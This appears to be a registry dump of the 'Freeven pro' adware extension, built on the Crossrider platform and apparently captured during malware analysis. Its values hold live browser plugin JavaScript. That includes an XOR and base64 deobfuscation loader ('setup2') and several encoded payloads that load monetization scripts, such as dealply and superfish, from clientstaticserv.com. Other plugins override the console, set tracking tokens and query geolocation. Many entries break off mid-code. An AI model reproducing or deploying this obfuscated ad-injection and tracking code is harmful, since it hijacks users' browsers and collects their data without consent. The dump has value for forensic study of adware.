"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDg3ZjYxNDcxZDFjMTEwMTNiMGExZjU3NTI0NTU3MDAxMTA1MWU0MjVjNWEwMTBiMDYxYzRiMDIwNjE3MDMwNTAxMGIxMjA5MTExNDQwMTExZDEzMDc0YTFmMWI0YTAyMDkyNzExMTI0NjBmMDY1NzI0MzcyODMxM2YzYzI5MzEzMDM3MmMzNTUzMWIwMTA2MWEwMTA3NGUzNjI0MmMyNzM3M2MzYjMxMjcyMTI3MjQzYTNkMjEyYTIxMjE0ODM3M2EzMjNjMzcyMDI2M2EyYzMxMmQzNzJlM2QyZDMxMmEyMTIxMmEzNzQzMzMzYzM5M2QzMTM3MjEzYzNiMzUzZDJmMjEyYzNiMjkyODMwNTUzYTJlMmQyYTNjMjYzYjM3M2MyYzIwMjMzMTM5MjMyNTM3MmIzNDI1MjAyZTMxNWE1ZjdmNjE0NzFkMWMxMTAxMWQyZDAxMTk0YTVmNTU0YTBkMDUxYTA4MDA0ZjQ3NGExYzA2MTYwNTQwMGIxYjFhMTgxNTFjMDYwMjEwMWExZDVkMWMwNjAzMWE0NzBmMDI0MTBiMTQyYTBhMDI1YjAyMTY0ZTJmM2UzNTNjMjQyYzM0M2MyMDJlMjczYzRlMTYxYTE2MDcwYzE3NTczZDJkMzEyYTJjMmMyNjNjMzczODJjMmQyNzMwM2EzYTNjMmM1ODJlMzEzYjIxM2EzYjM2MjcyMTIxMzQzYzI3MjAyMDJhM2EzYzJjM2EyZTQ4M2EyMTM0MjYyMTJhMmMyYzIyM2UzNDMyMmMzNzJiMzQyNTIwNGMzMTI3MzAyNzI3MzYyNjNhMmMzNTJiMmEyYzM0MzgzNTJhMjYyNDNjMmIyNzJjNTc0NDZmN2M0YTE1MWQxYjFmMWExYjIxMDE1NzUyNDU0MzVhNGE1ZjdmNDg0NTU1NDg0NzA3MGIwYTA3MWMwYjA0MTk0YTVmNTEzNTVhMDAxZDA3MTUwNTAxMGIF5"

[HKCU\Software\Freeven pro\Plugins\39]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""

[HKCU\Software\Freeven pro\Plugins\21]
"Name" = "debug"

[HKCU\Software\Freeven pro\Plugins\184]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTI3YjZmNTMwMTAyMDMwYTNkMDAwNTUzNWM1MTRiMWUwMzBlMTg0ODQ2NWUwODAxMWE1ODE5MTUxODAwMDYxMzBhMTQwNDA2MDcxOTQ2MTEwNjFjNDkxZjE5MDUxNTU1MDQxZDBlMTgwNTVmMDMwNTQ4MzUxYTFiMGUxODA4MzgwZDRiMzI0MjI5NDYyODQzNTUzMDQ0MzQ0NzQ5NWM1ZjJjNDM1NzQwNDQzNzRlM2I1ODVmNTk0MTU3NDQ1ODQxMzM0YjU4MzQ1ZjM0NDAyMjAwMDIxMjMzMGM0ZjNhMTAwYTE0MWE1MDI3MWIxYTA2MDcxNDE0MzgyZDRiNDU0YTU4NDI1OTU3MzYwMzA2MTIwMjE5MWMzYzA4MWMwMzRjMzYyOTM0MjgyNzIxM2EyMzJmMzUyYzI0MjgzYjM4MjIzNjNmMjczYzJjMjkyODVjM2MxZDA2MWQwNDEwMWIzZjEzNDczNzJkMmEyMzI5MjIzYTI0M2UzZTJkMjAzNjIyMzMzMzM2M2YzMzI1Mzc1MDQ1N2I2ZjUzMDEwMjAzMGExYjI3MWIxZDQ0NGI0OTU0MWYwZTFjMDIxYTRiNDk1ZTA3MDYwNDU0MDYxZDE5MDMwOTEzMDUxMzFhMGExODExNDcxMjA5MWM0NjE4MDcwOTBhNWQwNTFlMDExODBhNTgxZDA5NTczZDFiMTgwMTE4MDczZjEzNDcyZDRhMjg0NTI3NDM1YTM3NWEzODU4NDE1ZDVjMjM0MzU4NDc1YTNiNTEzMzU5NWM1NjQxNTg0MzQ2NGQyYzQzNTkzNzUwMzQ0ZjI1MWUwZTBkM2IwZDRjMzUxMDA1MTMwNDVjMzgxMzFiMDUwODE0MWIzZjMzNDc1YTQyNTk0MTU2NTczOTA0MTgxZTFkMTExZDNmMDcxYzBjNGIyODI1MmIyMDI2MjIzNTIzMjAzMjMyMjgzNzMzMzkyMTM5M2YyODNiMzI5"

[HKCU\Software\Freeven pro\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"

[HKCU\Software\Freeven pro\Plugins\244]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWM3MzY3NGExYTAwMDUwMTNiMDEwYjViNTQ0ODUwMWMwNTA1MWU0OTQ4NTYwYjEwMDY0NTVmMTQwMDE0MDYxZTBiMTExMzVhMTIxZTAzNWMxMDEwMGEwZjE3MDA1ZTE4MDAxOTAyMWExYTM3MDEwNDEwMDMwNTVjMGUxNzA0MzcwMTA0MDMxYTMxMDAxMzE4MWMxYzE3MDY1ZjFiMWQ0YzE3MTAwYTU1M2UyMDM0MDIyMTM3MjY0ODIxMmMyMzA3M2MxYjA5NDAyYTEzMjcxYjNjMzAxMjQ1MjEyNzI2NWM1ZDJjNTQwNzA0MTMwNzE3NWEyNjMxMmIyMDNiMjIyMjNjM2EyMzNjM2MzNzIxMjEzMzJlMjczNzM4MjY0YzQ0Nzg3ZDUzMDEwMjA2MDAxMDAwMjExNjU2NGI1MTVjNDc1MzczMTM=', 'gynhrtqqns'); }"

[HKCU\Software\Freeven pro\Installer]
"subid" = "0"

[HKCU\Software\Freeven pro\Plugins\102]
"Version" = "6"

[HKCU\Software\Freeven pro\Plugins\28]
"Version" = "4"

[HKCU\Software\Freeven pro\Plugins\246]
"Name" = "setup"

[HKCU\Software\Freeven pro\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"

[HKCU\Software\Freeven pro\Installer]
"DefaultBrowser" = "ie"
"FullVersionForUrl" = "1_34_05_04"

[HKCU\Software\Freeven pro\Plugins\103]
"URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/intext_5_m.js"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Freeven pro\Manifest]
"ThanksUrl" = "NA"
"PublisherId" = "21636"

[HKCU\Software\Freeven pro\Plugins\1]
"Name" = "base"

[HKCU\Software\Freeven pro\Plugins\246]
"JavaScript" = "setup2=function(d,a){var b=function(i){var k=function(l){if(typeof l!==string||l.length===0){return;}return l.replace(/.|\n/g,function(m){return m.charCodeAt(0).toString(16);});};var j=function(l){return l.match(/.{1,2}/g);};var g=j(k(a));var h=g.length;var f=$jquery_171.map(j(i),function(l,m){return(parseInt(l,16)^parseInt(g[m%h],16));});return String.fromCharCode.apply(String,f);};var e=function(){var i=appAPI;var g=i.utils;var h=g.Base64;var f=h.decode;return b(f.call(h,d));};var c=function(){var f=appAPI.JSON.parse(e());try{appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[f.pluginId]=function(){appAPI.internal.monetization.addRemoteJS({httpUrl:(typeof f.httpUrl===string)?(f.httpUrl.replace(/__CROSSRIDER_SUB_ID__/g,appAPI.internal.monetization.getSubId()).replace(/__CROSSRIDER_APP_NAME__/g,encodeURIComponent(appAPI.appInfo.name)).replace(/__CROSSRIDERÃ‡Â5"

[HKCU\Software\Freeven pro\Plugins\17]
"Name" = "jQuery"

[HKCU\Software\Freeven pro\Plugins\38]
"Name" = "IECallbacks"

[HKCU\Software\Freeven pro\Plugins\37]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100)};appAPI.openURL(a);}});appAPI.internal.callbacks.setEventHandler(runHelper,function(b){if(appAPI.isActiveTab()){var a=b;appA5"

[HKCU\Software\Freeven pro\Manifest]
"AddressbarURL" = "NA"

[HKCU\Software\Freeven pro\Plugins\93]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTQ2ZDZhNDYwMDBkMWUwYTNhMTcwMzQ1NTk0NDRhMTExZTBlMWY1ZjQwNDgxNDEzMWY1NzE5MGYxZjAwMWQwMTBhMTcwMDU3MDkxNTAyNGExODE0NGMxNzBlMjYwNzFiMDYwYjQxMGQxMDE0NTcxZDA2MDkwMDEwMWQwNDA2NTkwMDExMWMwMDAyMGMwNDEwNDUxMTFiMWMxODMzMGI1ODBlMDUwMDQyMmIyZDIzM2U1MjNhMzAyNDMxMmIzYjJhMzgzMzJiMjAzZDM4MzAzMTJhMjYyMzNlMzAzYTRkNGI2OTZkNGExMTFlMGUxZjE2M2ExNTBmNDY1MjU5NDgxMjFiMTExZjE0NTk0YjQ3MGUxZDBkNDExNjFhMTcwNjE2MGUxMDE5MTI0MTA2MDAwYTRjMTMxYjU2MTkxYzMwMDgwZTBlMGQ0YTAyMGExYTQ1MGIwOTFjMDgxNjE2MGIxYzU3MTIwNzEzMTUwYTBhMGYxZjVmMWYwOTBhMTcyNjAzNWUwNTBhMWE0YzM5M2IyYzJiNWEzYzNiMmIyYjI1MjkzYzM3MjYyMzI2MzYzNzJhM2YzODMwMmMyYjM4M2M0NjQ0NzM2MzU4MWYwOTFhMDAwYTBhMjExZDQ4NDA0ZjVjNWM0YjY5NDQ0ODU5NGE1ODE5MDAxZDEzMGEwNzA5MTU0ODQwNGYzZTRkMTQwYjBiMTgwOTAzMTQwODQ3MzI2ZDFl', 'ogcdhyjzoe'); }"

[HKCU\Software\Freeven pro\Plugins\22]
"Name" = "resources"

[HKCU\Software\Freeven pro\Plugins\72]
"Version" = "5"

[HKCU\Software\Freeven pro\Plugins\14]
"JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n<10?0 n:n;}if(typeof Date.prototype.to_CR_JSON!==function){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear() - f(this.getUTCMonth() 1) - f(this.getUTCDate()) T f(this.getUTCHours()) : f(this.getUTCMinutes()) : f(this.getUTCSeconds()) Z:null;};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf();};}var cx=/[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,escapable=/[\\\\x00-\x1f\x7f-5"

[HKCU\Software\Freeven pro\Plugins\1]
"JavaScript" = "appAPI._cr_config={appID:function(){var a=appAPI.appInfo;if(a){return appAPI.appInfo.id;}else{return appAPI.appID;}}};$jquery.extend(appAPI._cr_config,{sidebar:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/sidebar.css,themes:/plugins/images/sidebar}});$jquery.extend(appAPI._cr_config,{notifications_manager:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},statsBase:{production:http://nstats.crossrider.com,staging:http://staging-app.crossrider.com},geolocation:http://www.geoplugin.net/json.gp?jsoncallback=fn,meta:/notifier/ appAPI._cr_config.appID() /meta.json,messages:/notifier/ appAPI._cr_config.appID() /{id}.json,logger:/notifications.gif,loggerAPI:/api_notifications.gif},notifications:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/notifications.css,themes:/plugins/images/notifications}});a5"

[HKCU\Software\Freeven pro\Plugins\44]
"Name" = "IEMisc"

[HKCU\Software\Freeven pro\Plugins\183]
"Version" = "3"

[HKCU\Software\Freeven pro\Plugins\2]
"Version" = "2"

[HKCU\Software\Freeven pro\Manifest]
"ModeType" = "production"

[HKCU\Software\Freeven pro\Plugins\35]
"Version" = "4"

[HKCU\Software\Freeven pro\Plugins\14]
"Name" = "CrossriderUtils"

[HKCU\Software\Freeven pro\Plugins\102]
"Name" = "dealply_m"

[HKCU\Software\Freeven pro\Manifest]
"UninstallerOfferUrl" = "NA"

[HKCU\Software\Freeven pro\Update]
"LastCheck" = "1427668149"

[HKCU\Software\Freeven pro\Plugins\177]
"Version" = "2"

[HKCU\Software\Freeven pro\Plugins\41]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Freeven pro\Plugins\64]
"JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){5"

[HKCU\Software\Freeven pro\Plugins\46]
"Version" = "5"

[HKCU\Software\Freeven pro\Plugins\91]
"JavaScript" = "(function(i){var l=05-04;if(!appAPI.isBackground&&appAPI.dom&&appAPI.dom.isIframe()){return;}var t=appAPI.utils.MD5;if(!t||!t.encode){t={};t.encode=function(H){return H;};}if(typeof appAPI.internal.monetization===undefined){appAPI.internal.monetization={};}var C=appAPI.utils;var F={DBNamespace:monetization_plugin_,RULS_JSON_NAMESPACE: rules_,MONETIZATION_PLUGINS_IDS:monetization_plugins_ids,IS_INSTALL_REPORTED:is_install_reported_,STATS_NAMESPACE:stats_,PLUGINS_VERSION:plugins_version_,GEO_URL:http://ipgeoapi.com/,BASE_DATE:new Date(2013,0,1),updateInterval:1000*60*60*6,rulesJsonHostUrl:http://app.clientstaticserv.com/monetization_campaigns/,statsHostUrl:http://logs.clientstaticserv.com/monetization.gif?,errorHostUrl:http://errors.clientstaticserv.com/monetization-error.gif?,countryName:,reportQueryString:,subID:000000000000000000,reportEvents:{installEventId:0,dailyEventId:1,vertical:2,runningPlugins:6,installVertical:13,impressionsEventId:31,newAllowedVertical:32,policyAppDefu5"

[HKCU\Software\Freeven pro\Plugins\4]
"JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f(< a >).appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHtts5"

[HKCU\Software\Freeven pro\Manifest]
"PluginsManifestVersion" = "17"

[HKCU\Software\Freeven pro\Plugins\184]
"Version" = "9"

[HKCU\Software\Freeven pro\Plugins\37]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEBrowserEvents.js"

[HKCU\Software\Freeven pro\Plugins\72]
"JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=p5"

[HKCU\Software\Freeven pro\Plugins\93]
"Name" = "superfish_no_coupons_m"

[HKCU\Software\Freeven pro\Plugins\42]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEInternal.js"

[HKCU\Software\Freeven pro\Plugins\38]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IECallbacks.js"

[HKCU\Software\Freeven pro\Plugins\43]
"Name" = "IEMessaging"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Freeven pro\Plugins\22]
"URL" = "http://js.clientstaticserv.com/plugins/mins/resources.js"

[HKCU\Software\Freeven pro\Plugins\37]
"Name" = "IEBrowserEvents"

[HKCU\Software\Freeven pro\Plugins\35]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEAjax.js"

[HKCU\Software\Freeven pro\Manifest]
"SetNewTab" = "false"

[HKCU\Software\Freeven pro\Plugins\207]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbac15"

[HKCU\Software\Freeven pro\Manifest]
"Name" = "Freeven pro"

[HKCU\Software\Freeven pro\Plugins\94]
"Version" = "2"

[HKCU\Software\Freeven pro\Plugins\246]
"Version" = "9"

[HKCU\Software\Freeven pro\Plugins\3]
"Version" = "2"
"Name" = "ie8_fix_2"

[HKCU\Software\Freeven pro\Plugins\184]
"Name" = "noproblemppc_m"

[HKCU\Software\Freeven pro\Plugins\13]
"URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderAppUtils.js"

[HKLM\SOFTWARE\Freeven pro\IE]
"TotalProfiles" = "1"

[HKCU\Software\Freeven pro\Plugins\177]
"JavaScript" = "(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(*crossrider.com/extension_dashboard/dashboard.html))){return;}function o(p){return String(p).replace(//g,>);}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]=== ||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===[EXPRESSION]||p===[INDENTED-EXPRESSION];}function af(p){return p.replace(/^\s\s*|\s\s*$/,);}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===undefined?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\n||!q){ac=true;aE.push(\n);}for(var p=0;p
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Freeven pro\Plugins\43]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEMessaging.js"

[HKCU\Software\Freeven pro\Plugins\38]
"Version" = "4"

[HKCU\Software\Freeven pro\Plugins\182]
"Name" = "openUrl"

[HKCU\Software\Freeven pro\Plugins\44]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEMisc.js"

[HKCU\Software\Freeven pro\Code]
"NewTabJavaScript" = ""

[HKCU\Software\Freeven pro\Plugins\177]
"Name" = "crossriderDashboard"

[HKCU\Software\Freeven pro\Installer]
"Time" = "1427668122"

[HKCU\Software\Freeven pro\Plugins\93]
"Version" = "9"

[HKCU\Software\Freeven pro\Plugins\47]
"JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:http://resources.crossrider.com,staging:http://staging-app.crossrider.com},update:/apps/{appId}/resources/meta/{lastVersion}},env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:(appAPI.internal.debug.isDebugMode()&&appAPI.internal.db.get(debug_resources_path))},w=o(meta)||{},g=o(remote_resources)||{remoteId:0},t=o(queue)||{},B=o(lastVersion)||0,A,s;appAPI.resources={init:function(){if(C.isDebug){h();}else{l(function(D){if(D){k();}else{h();}});}},isReady:function(D){s=D;if(A){h();}},get:function(D){if(typeof jQuery!==undefined){D=jQuery.trim(D);}return b(D,string);},includeCSS:function(G,F){if(typeof jQuery!==undefined){G=jQuery.trim(G);}var E=b5"

[HKCU\Software\Freeven pro\Plugins\45]
"Name" = "IEOnRequest"

[HKCU\Software\Freeven pro\Plugins\223]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE2NTY4NGIxMTBkMWIwMzNkMDMwNjRkNWI0OTViMTExYjA3MTg0YjQ1NDAwMjBkMTc1NzE5MWExYjEwMGUwYjRmMGExNjE0NDAwMDBiMDMwMzFmMTU0NjQ4NGQ1YTQ1NWY0NjU4NWE1NjVmNGM1NjFmMDEwZDFkMDUwZTA1NDcxMzBhNTAwMDFkMTMwMzBiNWMzNjI2M2EzZDNjM2IyMjM4MjYyNTJjMmIyNjNjMjYyYTJlMjMyYjNlMzY1YjU1NjU3YTRhMDEwNjFhMDYwMDE3MzAwYjUxNTI1MTU4NWQ1MjQ1NzM1OTRmNTM0ODUzMWMwYTEzMWQxMDFhMGUxZjRhNGI0YTM0NDMxYTExMTYxZjAzMDExZjBkNGQzYzYzMDQ=', 'joaiyyoshq'); }"

[HKCU\Software\Freeven pro\Plugins\41]
"Name" = "IEInfo"

[HKCU\Software\Freeven pro\Plugins\104]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[104] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(104, [shopping])){ return; } var app_id='0'; var uid='0'; var app_name = ''; try{app_name = '&name=' encodeURIComponent(appAPI.appInfo.name);} catch(e) {app_name='';} try{app_id = appAPI.appInfo.id;}catch(err){} if (appAPI && appAPI.installer && appAPI.installer.getParams) { app_id = appAPI.installer.getParams().source_id; } if(appAPI && appAPI.installer && appAPI.installer.getUserId){uid=appAPI.installer.getUserId();} var token = appAPI.db.get(jw_token); if(token === '' || token===null || token === undefined){ var S4 = function() {return (((1 Math.random())*0x10000)|0).toString(16).substring(1);}; token=(S4() S4() - S4() - S4() - S4() - S4() S4() S4()); appAPI.db.set(jw_token,toke15"

[HKCU\Software\Freeven pro\Code]
"AppJavaScript" = ""

[HKCU\Software\Freeven pro\Plugins\46]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setIn5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Freeven pro\Plugins\28]
"Name" = "initializer"

[HKCU\Software\Freeven pro\Plugins\43]
"Version" = "5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Freeven pro\Manifest]
"UpdateInterval" = "360"

[HKCU\Software\Freeven pro\Plugins\64]
"URL" = "http://js.clientstaticserv.com/plugins/mins/appApiMessage.js"

[HKCU\Software\Freeven pro\Plugins\102]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWU3YTVhNDM0ODUxNGQwYTFjMDAxNTI1MDgwZjRhNGI0ZjQwMDAwMDExMDA0MDRjNDcxODQxMDExYTEwMTcxYTA5NGQwMTFmMDkwZDQ3MTcxNzE0MDg0YzAyMTAxOTAzMWIxNzE3MTkwYTE3NDYxYjFjNWQwYjFjMDQxZTE0MDYwNDRjMGMxMDBjMDYzYTJmMjUyMDNhM2UzYzMxM2EzZDIxMzUyODNjM2IyNDJkM2QyMTMwM2EyZjVjMDIxODAxM2IwYjFjMTgwMDRkMjUzYzJiMjMyMDMxM2IyNjJjMzQzZjMxMzczMDNmMzIzNzNhMjQzZDNmM2MzNzU3MDcwYjBjNDkzYTJmMzkzMTI3MjIzYzMwMjEzMDIwMjIyNTM2M2IzNDNkM2QyMTMwM2EyZjU4NGY2MjUxNGY0MjQ4NTYwZDA0MGUxMzFiMjQxZDBlNGE0ZTQ1NTIxMjE3MWMwMTFjNTg0NzViMGMyZjE5MTEwYzAzMDUxMTM3MWQwYjE2MTU0ZDFjMWQxYzAxMGMxYTRiMTMxNTBlNDcxMjFkMDYxYTViMGYxMTBjMDIxYjEyMWQwYjE4MDA0YjFhMDk1YzBiMTkwZTBjMDYxMTA5NGQxOTExMGMwMzMwM2QzNzM3MzczZjI5MzAzYTM4MmIyNzNhMmIzNjI1MzgzYzIxMzUzMDNkNGUxNTE1MDAyZTBhMWMxZDBhNWYzNzJiMjYyMjM1MzAzYjIzMjYyNjJkMjYzYTMxMmEzMzM3M2YyZTJmMmQyYjNhNTYxMjBhMGM0YzMwM2QyYjI2MmEyMzI5MzEyMTM1MmEzMDM3MjEzNjM1MjgzYzIxMzUzMDNkNGE1ODZmNTA1YTQzNDg1MzFmMGUxZDEzMGMxZTMzMDc0